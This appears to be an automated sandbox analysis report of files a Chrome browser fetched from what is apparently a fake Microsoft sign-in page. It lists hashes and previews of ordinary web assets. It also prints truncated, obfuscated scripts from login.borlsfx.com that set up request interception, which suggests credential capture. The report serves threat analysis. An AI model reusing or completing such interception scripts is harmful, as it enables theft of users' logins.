                                                    Preview:L..................F.@.. ...$+.,.....<z..P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y1.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y9.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y9.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y9............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65311)
                                                    Category:downloaded
                                                    Size (bytes):83981
                                                    Entropy (8bit):4.7735566283508355
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3D5EF2BF867C4054A2F336CDBAD9E1DC
                                                    SHA1:07228D1FA3245EE156A27A353F45758A3207849F
                                                    SHA-256:A361E7885C36BACB3FD9CB068DA207C3B9329962CAC022D06E28923939F575E8
                                                    SHA-512:168DEB96B663FE4EEE8D39C78380864760FB912B34BF82CB6A7C36AA4B18B91944CCEFAD71A10F428810D0A6A818DDBAFF3AE7DB42264750DFB8B5A73A8EDA04
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
                                                    Preview:/*!. * Font Awesome Free 6.0.0-beta3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2021 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):190152
                                                    Entropy (8bit):5.348678574819375
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4877EFC88055D60953886EC55B04DE34
                                                    SHA1:2341B026A3E2A3B01AFA1A39D1706840D75E09B3
                                                    SHA-256:8405362EB8F09DF13AE244DE155B51B1577274673D9728B6C81CD0278A63C8B0
                                                    SHA-512:625844EDC37594D5C2F7622BD1B59278BF68ABB2FA22476C56826433C961C7B1924858A7588F8B6284D3C5AC8738ECB895EEC949DE18667A98C04A59CB03DAC0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                    Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (17220)
                                                    Category:downloaded
                                                    Size (bytes):17555
                                                    Entropy (8bit):5.453598269550384
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DA82A10FA8D8F2C50A6A1023E9CA1E9B
                                                    SHA1:FD482427F174745199B7C35ABEFBC60E9D74682B
                                                    SHA-256:624B8E9796ED8331E26E5E994BB64C2692DCC7643D0CE53F8E1E620D8C71D444
                                                    SHA-512:18028A0DF524E385E9427CC8DC5F7DC72E679BDE11CFBBAD0196E32D626EAEF14C5D668534FFE864F154E1A12A6D69F6A1F1280AF993E72C3EAD619AAC35BBB6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdn.jsdelivr.net/npm/ua-parser-js@1.0.38/src/ua-parser.min.js
                                                    Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/ua-parser-js@1.0.38/src/ua-parser.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(i,e){"use strict";var o="function",a="undefined",r="object",t="string",n="major",s="model",b="name",w="type",d="vendor",l="version",c="architecture",u="console",p="mobile",m="tablet",f="smarttv",h="wearable",v="embedded",g="Amazon",x="Apple",k="ASUS",y="BlackBerry",_="Browser",T="Chrome",S="Firefox",q="Google",z="Huawei",N="LG",A="Microsoft",E="Motorola",O="Opera",U="Samsung",C="Sharp",P="Sony",j="Xiaomi",M="Zebra",R="Facebook",B="Chromium OS",D="Mac OS",V=function(i){for(var e={},o=0;o<i.length;o++)e[i[o].toUpperCase()]=i[o];return e},I=function(i,e){return typeof i===t&&-1!==G(e).indexOf(G(i))},G=function(i){return i.toLowerCase()},L=function(i,e){if(typeof i===t)return i=i.replace(/^\s\s*/,""),typeof e===a?i:i.substring(0,500)},F=functi
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1378
                                                    Entropy (8bit):4.316299265862323
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F83EBFF69A4A1685E4DC9650CDAB8886
                                                    SHA1:FD21658884945B00157557AE06803DAA6A9F10C6
                                                    SHA-256:7B1669DA90261CDB1483950BB480AD96875F84B09BC48D1055303CE94821BF64
                                                    SHA-512:AA21A03AB84FA0129AFCED8A56E499757A6625C9B24A81EE08F5775B9B542F71BA67EAE817D633CB4E4533A8CF6A0DDA80BD7EE8A90E95AB3D39A77F88073F23
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_account_aad_a8332c62695d74843a11daf39a74e552.svg
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:#e6e6e6;}.b{fill:#404040;}</style></defs><circle class="a" cx="24" cy="24" r="24"/><path class="b" d="M32.5,14A1.492,1.492,0,0,1,34,15.5V38.5A1.494,1.494,0,0,1,32.5,40h-17A1.494,1.494,0,0,1,14,38.5v-23A1.494,1.494,0,0,1,15.5,14h4.873l-3-6h2.25l3,6h2.751l3-6h2.25l-3,6ZM32,16H23.623l1.266,2.546A1.13,1.13,0,0,1,25,19a1.009,1.009,0,0,1-1,1,1,1,0,0,1-.534-.149.974.974,0,0,1-.368-.4L21.375,16H16v22H32ZM20,26a3.92,3.92,0,0,1,.312-1.555,4.023,4.023,0,0,1,2.133-2.133,4.041,4.041,0,0,1,3.109,0,4.014,4.014,0,0,1,2.133,2.133A3.886,3.886,0,0,1,28,26a3.937,3.937,0,0,1-.288,1.485,3.987,3.987,0,0,1-.8,1.266A5.7,5.7,0,0,1,28.2,29.7a5.907,5.907,0,0,1,.968,1.251,6.388,6.388,0,0,1,.616,1.461A5.786,5.786,0,0,1,30,34H28a3.877,3.877,0,0,0-.312-1.554,4,4,0,0,0-2.133-2.133,4.011,4.011,0,0,0-3.109,0,4.023,4.023,0,0,0-2.133,2.133A3.912,3.912,0,0,0,20,33.995H18a5.786,5.786,0,0,1,.218-1.586,6.388,6.388,0,0,1,.61
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                    Category:downloaded
                                                    Size (bytes):17174
                                                    Entropy (8bit):2.9129715116732746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (28007), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):28007
                                                    Entropy (8bit):5.2666466415846145
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:91C899701087A3A164944F198412267E
                                                    SHA1:CD61CFCFB517559E078EBEDCC4C0528A6EA01619
                                                    SHA-256:CF36756988E3EF23DD7F851BCDC3D02CFAEA21AB854BE40A5CC00F67E5DA7AA3
                                                    SHA-512:60C55DE6221481EAC12F43E1C5A1865FB95185E0C3E96411CA41C4766461CA32C2528611263A4DE2DF60EDD6DAA9970AB2E7B8C47D6F4F2945B96437C2D1AB8D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.borlsfx.com/7102f140f4/f9075051.js
                                                    Preview:(function(_0x4c6a3f,_0x14692b){const _0x22897e=_0x463a,_0x42fa82=_0x4c6a3f();while(!![]){try{const _0xae5186=-parseInt(_0x22897e(0xea))/0x1+parseInt(_0x22897e(0x128))/0x2+parseInt(_0x22897e(0x11e))/0x3*(-parseInt(_0x22897e(0xf0))/0x4)+parseInt(_0x22897e(0xd8))/0x5*(-parseInt(_0x22897e(0xe6))/0x6)+-parseInt(_0x22897e(0xe4))/0x7+-parseInt(_0x22897e(0x139))/0x8+parseInt(_0x22897e(0xf8))/0x9;if(_0xae5186===_0x14692b)break;else _0x42fa82['push'](_0x42fa82['shift']());}catch(_0x4f0996){_0x42fa82['push'](_0x42fa82['shift']());}}}(_0x46d1,0xbc2c4),((()=>{const _0x3190f3=_0x463a,_0x1a0fd1={'baseUrl':null,'capture':!0x0,'xhr':!0x0,'fetch':!0x0,'original':{'create':window['Document'][_0x3190f3(0xd2)][_0x3190f3(0xc6)]},'hosts':'{}'};let _0x54d7b9;(_0x54d7b9=location[_0x3190f3(0x103)][_0x3190f3(0x9f)]('.')[_0x3190f3(0x120)])>0x2?_0x1a0fd1[_0x3190f3(0x119)]=location[_0x3190f3(0x103)][_0x3190f3(0x9f)]('.')['slice'](_0x54d7b9-0x2)[_0x3190f3(0x133)]('.'):_0x1a0fd1['baseUrl']=location[_0x3190f3(0x103)];
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 37 x 52, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):61
                                                    Entropy (8bit):4.035372245524405
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C863EDE65C5BCDE0BFB7DD29731C4E8B
                                                    SHA1:895F7787D93685E3D51CC4F19BA458BFB437B90E
                                                    SHA-256:5FEE2B2B78974E493C25E896421F271159A5951CA1902E0175B2720E00961293
                                                    SHA-512:F0711F002850B5B35895A4778904417D1B4AA883F786236846C09C07EE3BBB75D0FCEE9B78B52D5823464F671003DB45BE9B3F8A65D7563E9F4F9D52E84527AB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR...%...4......vfj....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (64616)
                                                    Category:downloaded
                                                    Size (bytes):450755
                                                    Entropy (8bit):5.449552702818663
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:900C7DA993921F883DD05347B2D1CC08
                                                    SHA1:31F7A9C889C260DD56AE1B601C7AC73AC806C38F
                                                    SHA-256:3BB35E786C5EF0186C1202CE43B9745D0EA7315C2158259BDFBDF9CC028780C6
                                                    SHA-512:8FD0A4EB1E15FFE26081B9F7731260B8C18F89884A4E37258B4890C10D3FAF1CA9DEF61A1B86436A16A49345E56EF8D5416300B7C4C1D0085544B83D9D8958D1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (28661), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):28661
                                                    Entropy (8bit):5.277314714053252
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FF73B67A48082FDE9DABB38108341708
                                                    SHA1:872994643B7DC6DA835494C0F00BD9AAC2CC426D
                                                    SHA-256:199BE1753FE1F9A086FAD24D0BE84933B7592BAA18CF4C813387E7A26AA52928
                                                    SHA-512:4733DC689A78124F2C85E3FAB9A95BC9DCA4E59772738183793B44A8AD4E5054F76B36D5B348C0432208677FA41B3F2B742CE57B636DFED179D2F655D380FDE7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.borlsfx.com/7102f140f4/b4801717.js
                                                    Preview:function _0x2725(_0x5d057d,_0x204210){const _0x11ad5b=_0x11ad();return _0x2725=function(_0x2725ca,_0x2099be){_0x2725ca=_0x2725ca-0x1b5;let _0x27790d=_0x11ad5b[_0x2725ca];return _0x27790d;},_0x2725(_0x5d057d,_0x204210);}(function(_0x7073ea,_0x500fd8){const _0x32d923=_0x2725,_0x5056c5=_0x7073ea();while(!![]){try{const _0x85b5a3=-parseInt(_0x32d923(0x1fa))/0x1*(parseInt(_0x32d923(0x1ef))/0x2)+parseInt(_0x32d923(0x1ec))/0x3*(-parseInt(_0x32d923(0x25d))/0x4)+parseInt(_0x32d923(0x1c7))/0x5+parseInt(_0x32d923(0x1b6))/0x6*(parseInt(_0x32d923(0x1cb))/0x7)+-parseInt(_0x32d923(0x1db))/0x8+-parseInt(_0x32d923(0x27b))/0x9+parseInt(_0x32d923(0x270))/0xa*(parseInt(_0x32d923(0x24f))/0xb);if(_0x85b5a3===_0x500fd8)break;else _0x5056c5['push'](_0x5056c5['shift']());}catch(_0x2ace58){_0x5056c5['push'](_0x5056c5['shift']());}}}(_0x11ad,0x8ebf4),((()=>{const _0x191d39=_0x2725,_0x5cab2c={'baseUrl':null,'capture':!0x0,'xhr':!0x0,'fetch':!0x0,'original':{'create':window[_0x191d39(0x275)][_0x191d39(0x262)]['cre
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 105204, version 768.67
                                                    Category:downloaded
                                                    Size (bytes):101484
                                                    Entropy (8bit):7.989562773608293
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E028A1E8CF0560EB0EC4E7382BA8005B
                                                    SHA1:F507CC701BAEB3BA34B6DE696FCB6C6DAB692999
                                                    SHA-256:A5550728260205A06523E2CC8BFAF4468AC3073AD0BA725214F350F8D9D5B009
                                                    SHA-512:5076A53D484E704AB6013631B992943C333C22AC87EE28F4F1223B2E2651AEA193C8FFEAE48E865960282A1DE2B906988D74BED910284A15AFDE2851D6E570B9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2
                                                    Preview:wOF2...............h.......C.....................8.$. .`..D..8..`.H..H. ..VQf......Z?.....=..j..o......._......; ..o.....9..........'P.....U.....P.[.+7.\4....Y.B.d....[.h.!.....Z...2.....]5..]]]3..f.......E......9`.2.A'N.X..v....N....C#.yZ.Z............4.....I.Y...;..(q@..8H..m~v.KN....{.F..:..%..u...)U!JP...$v......(.n./.S:.(T..Mh.(.t../...N+.|..o.......9Zr!P.........T\...c!#.||*.....O4G(.........p.{?..#...Y..2".`DV.....U..jNT.3[.9}.$g.(.....H.Y5"......GD.#.`.Er.......(..Z.>...D...%.].[.......p..!..qU.&'Q .$.j2......B..........^.`4..L.[....R......Q.+.[.q..%...........A..$..N.A.aK.d.'. ..7~..t.a.oj...8....u._h%.+.%.K...GC....R.|..u.W.......L..{W.....d.u:..L.Q...<.YBt....X.s.z"#....R$Tg.9......@A.;.?.w}.u.z...".'..w..i....w..&...i...3....,.n.hC<..8.3(...L..4....3....'x.M.J}...v.......S.4._[......>a.@I.8i[.S....A...%..Y2.ezM...M..%>.af.P.?...8..G...x:.......Hi.:..S.\.g....6.IY...i..aN~..F...c....al;1.R.3.._.l#...3..s?M.5..|...4h
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):2280
                                                    Entropy (8bit):7.893049359464019
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:07FA04B16E4C602C3FF5088A746C9110
                                                    SHA1:24984D9823BA3A2F80A1CA43061D2A51F0AEC036
                                                    SHA-256:FBECE0BDA013C4CDB518612E888337A320AAFE76F11F269E05517CC06F2EE771
                                                    SHA-512:0D9416167A61B755477ACD41AA5F49715C68D296421CF05261B64EEF7CCD35E750195B6C902B4F339FC9ED266096609149BBC9CF84E324783652B61C75550694
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-close-round-512.png
                                                    Preview:RIFF....WEBPVP8L..../......m.0....C....K..Q.a2....S.hfZ.Rn$I.$..d.Y.af....I.m..s.g.m.v..s.o.m[.o......=K.$I..EF....N....m.F..?../3].......A. .$H...f...........^.y......^.y.....Z..u.........:.... ......_a. .+~.N.$.$s...]..#.........$.L..%OY.q$....$......A..}..._E..z..z9.....;.....";|.&.x7.>o..:X..b..x$.....Q..D.].~..=<.o....wPx*.QN.L%.`..s..+.....a........e.x4....~..i.....p...<.n.;......I....7.C88.G.a+7.....Y...|..hQ8...c U.p...},J..=.I.....7....L....C V..}..gQM.....K........}F_.......................x.d..f....._cw..'`.@.^.LX....3.......I..6.......Yj.N.~......U...4../......j.x.8.....G=..L.......i....>@.N...w..3.......v($....K}.....`B.Q..>c^...Q...h....s...x../...qM.~,.l_:...~.......(V..k..#....>./...#.x_0.P.&.+..u.b...C....`.'.Xs./....F.,..4........#r...R..d......t.A....F+|0..Z1.hw.c.....H+..T.1]....q.....m..de.X...m.W..pvn.~.Z.D.+J=.s.q%+.F...K...`...4.A.)4.C.I4.E.i4.Gs.4.IS.4.K3.4.M..4.O..5.Q.(5.S.H5.U.h5.Ws.5.YS.5.[3.5.]..5._...gX:..9.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:C source, ASCII text, with very long lines (6034)
                                                    Category:dropped
                                                    Size (bytes):7007
                                                    Entropy (8bit):5.2164864756135145
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C0C5C444FC152180B5277A71A39BA0C3
                                                    SHA1:63A136D6184B65ADE88930769AB25404C8CD6446
                                                    SHA-256:A953FD7A786C6215710F65F9CE29BBC4BA513E5C718FF530210149D70C971540
                                                    SHA-512:394893CA47D86ED3F4F6F75019420CE727421419A1CD57C7E19294CAF4EA43078EA1A55839D363A7AE75725C580ECA62BD2B113D6BEC60D0E0FD1873053943EA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[19],{513:function(i,e,n
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):764
                                                    Entropy (8bit):4.74727172577332
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AF7363CA84DC1C09C5ABB69DDA664EEA
                                                    SHA1:1B1497B9DB7EEFB594E45BF4165C75F05AE64E12
                                                    SHA-256:3CE5BCA513C0D0115CDEF2D28CB59EC98E1CD70A33C4CC839B60366EA28C7CA6
                                                    SHA-512:1828ACE2F7A24846755CEDE958555C58D35B8797790BFE4F6A2C181D5FF751B408F891524298688C2404D9554D2194A9F493616A5CF8F7CDD68CA99EF8663A1A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ipapi.co/json/
                                                    Preview:{. "ip": "8.46.123.189",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8765), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):8765
                                                    Entropy (8bit):5.738750715798295
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:87F75DEF3EA8CCA1E354AD0B4F78A900
                                                    SHA1:314B58EAB6CF1E28DE6D8D5CAD12FB4CF81E3A41
                                                    SHA-256:54965CCAB37720C44FBF6A560A692685ED14267886EC30F466040E0BD77AFE8E
                                                    SHA-512:0C43793B4854205CFD75A7D4792AB0AFD6010525A08A7C3B47B200B4567B2D106D82F3FD2203F5BA2CC1D1FE34F9B77ED2EE49F6BC4F18D8DD8453FD9C7D6FDB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=parseInt(V(544))/1*(-parseInt(V(510))/2)+parseInt(V(555))/3+-parseInt(V(525))/4+-parseInt(V(463))/5+parseInt(V(488))/6*(parseInt(V(503))/7)+parseInt(V(568))/8*(parseInt(V(460))/9)+parseInt(V(534))/10*(parseInt(V(489))/11),f===d)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,350742),h=this||self,i=h[W(474)],n={},n[W(506)]='o',n[W(539)]='s',n[W(454)]='u',n[W(546)]='z',n[W(492)]='n',n[W(570)]='I',n[W(543)]='b',o=n,h[W(482)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,F===null||void 0===F)return H;for(J=x(F),E[a8(512)][a8(577)]&&(J=J[a8(455)](E[a8(512)][a8(577)](F))),J=E[a8(487)][a8(548)]&&E[a8(501)]?E[a8(487)][a8(548)](new E[(a8(501))](J)):function(P,a9,Q){for(a9=a8,P[a9(566)](),Q=0;Q<P[a9(550)];P[Q]===P[Q+1]?P[a9(496)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(490)][a8(517)](K),L=0;L<J[a8(550)];M=J[L],N=v(E,F,M),K(N)?(O='s'===N&&!E[a8(494)](F[M]),a8(457)=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):1057
                                                    Entropy (8bit):7.6851406288304105
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                    SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                    SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                    SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png
                                                    Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23760, version 768.67
                                                    Category:downloaded
                                                    Size (bytes):23760
                                                    Entropy (8bit):7.984594739139778
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:82BAFEE9DCC7B6FB7BCA7ED323F9B7AE
                                                    SHA1:FFD3B574CB7DB4E2CD0CC2EA9214F0BB8989207F
                                                    SHA-256:886FD1E6CE992EDE514743A826FA71FEFDB577047A2A899CA95F6F28F3305D09
                                                    SHA-512:EED2562B9DDECEB57207E22B35F7F1AEC302D644FDDE0341DA707FBE9A66EADB740CA002ADCA2E88F9F2C4F68A7130A24173A7447CD9B9494C0B33CA96A18039
                                                    Malicious:false
                                                    Reputation:unknown
